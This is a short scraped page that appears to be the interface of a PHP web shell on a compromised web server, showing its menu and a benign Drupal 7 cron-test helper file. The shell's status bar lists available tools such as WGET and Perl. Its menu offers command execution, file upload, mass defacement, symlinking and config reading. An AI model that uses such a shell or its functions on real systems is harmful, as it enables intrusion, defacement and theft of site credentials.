OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/html/hpsc/../infor/supporto/../../antarctic-drupal-7.89/themes/../modules/system/tests/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
<?php /** * @file * Helper module for CronRunTestCase::testCronCacheExpiration(). */ /** * Implements hook_flush_caches(). */ function system_cron_test_flush_caches() { // Set a variable to indicate that this hook was invoked. variable_set('system_cron_test_flush_caches', 1); return array(); }